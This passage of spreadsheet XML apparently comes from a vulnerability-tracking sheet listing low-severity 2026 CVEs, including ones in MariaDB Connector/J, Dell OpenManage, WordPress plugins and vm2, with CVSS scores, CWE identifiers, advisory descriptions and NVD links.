      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, ClientMessage.readPacket processes a server-initiated LOCAL INFILE protocol packet 0xfb without enforcing allowLocalInfile=false. When an application sends a LOAD DATA LOCAL INFILE COM_QUERY, a rogue or man-in-the-middle server can echo the same filename and cause the connector to transmit that file despite the disabled option. The server cannot redirect the request to an arbitrary path and can receive only the exact file already selected by the application, so exploitation requires an application that actively loads sensitive data over an untrusted connection. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61700</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78426</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="inlineStr"/>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>The NeuVector JWT verifier accepts noncanonical Base64URL encodings of the same RSA signature field. An attacker holding a valid JWT that has not expired, but was logged out of NeuVector, can continue using the non-expired token with equivalent spelling of the RSA signature field until the token validity expires.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78426</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81438</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="inlineStr"/>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains Use of a Broken or Risky Cryptographic Algorithm vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81438</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81439</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="inlineStr"/>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Incorrect Authorization vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Protection mechanism bypass.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81439</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85716</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="inlineStr"/>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M376" s="5" t="inlineStr">
        <is>
          <t>3.0.12</t>
        </is>
      </c>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-390</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 3.0.8 until 3.0.12, processScramAuthenticationInfo and processAuthenticationInfo compute the SCRAM ServerSignature or Digest rspauth verification result but log a mismatch and still deliver the response as authenticated. On a non-TLS or compromised transport, a peer that has not proved knowledge of the shared secret can therefore be accepted as the server. The fix rejects a present invalid value and computes Digest rspauth from the Authorization parameters actually sent, but verification remains unenforced when the value is absent, the sent parameters cannot be recovered, or Digest uses qop=auth-int. This issue is fixed in version 3.0.12.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85716</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86446</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="inlineStr"/>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t>The LearnPress  WordPress plugin before 4.4.7 does not restrict the correctness flags it returns when a quiz answer is checked, allowing unauthenticated attackers to obtain the correct answer to every option of a question, along with the instructor's explanation, on courses configured to be taken without enrolling.</t>
        </is>
      </c>
      <c r="T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86446</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91008</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>The Event Booking Manager for WooCommerce  WordPress plugin before 5.3.8 does not perform an ownership or authorization check before rendering booking confirmation details, allowing unauthenticated attackers to retrieve registered attendees' personal information (full name, email address, phone number, and custom registration fields) by supplying an enumerable booking reference. Exploitation is limited to sites configured to use the Event Booking Manager for WooCommerce  WordPress plugin before 5.3.8's native (non-WooCommerce) checkout, which is not the default.</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91008</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91017</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>The Robokassa payment gateway for Woocommerce WordPress plugin before 1.8.9 does not verify the authenticity of incoming payment notifications when its non-default deferred-payment feature is enabled, allowing unauthenticated attackers to forge a notification and mark arbitrary WooCommerce orders as paid or on-hold without payment or a valid signature.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91017</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54471</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>Dell SmartFabric Manager, versions prior to 2.2.1, contains an Improper Handling of Insufficient Permissions or Privileges vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54471</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45723</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-209, CWE-22, CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. Prior to 1.6.6 and 1.7.3, managementServer.CreateSchematic in internal/backend/grpc/schematics.go passes the caller-controlled TalosVersion field to imageFactoryClient.OverlaysVersions without validating it as a version. An authenticated Operator can submit traversal segments in TalosVersion, and url.URL.JoinPath normalizes them into unintended paths on the configured image-factory host. Omni then issues HTTP GET requests to those paths and reflects error-body content, enabling same-host endpoint probing and possible disclosure of internal diagnostics while preventing redirection to another host or write requests. This issue is fixed in versions 1.6.6 and 1.7.3.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45723</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50607</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer System Monitoring component included with NitroSense and PredatorSense. A WebSocket service was configured to listen on all network interfaces, which may expose the service to unintended network access.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50607</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87836</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="inlineStr"/>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>The Comments Import &amp; Export WordPress plugin before 2.5.4 does not restrict its comment export to users able to moderate comments, nor scope the export to content owned by the requesting user, allowing users with the Author role and above to retrieve every comment on the site, including commenter email addresses, IP addresses, unapproved comment content and comment meta.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87836</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75588</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>2.6</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-1287</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>Mattermost Desktop App versions &lt;=6.2 6.2.2.0 fail to validate the URL scheme when checking whether a target URL is internal to the connected server, which allows a network-positioned attacker to load a plugin popout window over an insecure connection via a link using a downgraded URL scheme. Mattermost Advisory ID: MMSA-2026-00717</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75588</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54579</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-345</t>
        </is>
      </c>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, ping() in libmport/ping.c accepted ICMP replies without validating icmp_id or icmp_seq and parsed the reply using a fixed IP-header offset instead of ip_hl. A network attacker able to inject or spoof visible ICMP replies could influence mirror latency selection, while a malformed packet carrying IP options could shift the ICMP header and trigger an out-of-bounds read. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54579</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81637</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t>Insufficient Session Expiration vulnerability in team-alembic AshAuthentication allows an attacker who obtains a victim's OAuth2 state value to replay the callback and sign that victim into an attacker-controlled account.
AshAuthentication.Strategy.OAuth2.Plug.callback/2 clears the stored session_params through a rebinding step inside its with chain, conn &lt;- delete_session(conn, session_key). Elixir evaluates the else block in the scope enclosing the with, so every failure path (the provider returning ?error=access_denied, an invalid code, a token-exchange error, or a registration or sign-in failure) reaches store_authentication_result/2 holding the original connection and the session entry is never removed. The value the module's own comment describes as protection against a CSRF-related attack is therefore consumed only when authentication succeeds, and survives a cancelled or failed attempt until the next request phase or session expiry.
This issue affects ash_authentication: from 0.6.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81637</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92945</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 contains a module allowlist bypass vulnerability in isPathAllowedForModule that uses raw string prefix matching instead of boundary-anchored comparison. Attackers can reach non-allowlisted packages sharing a prefix with allowlisted modules by performing relative requires from allowlisted packages when transitive loading is disabled.</t>
        </is>
      </c>
      <c r="T387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92945</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
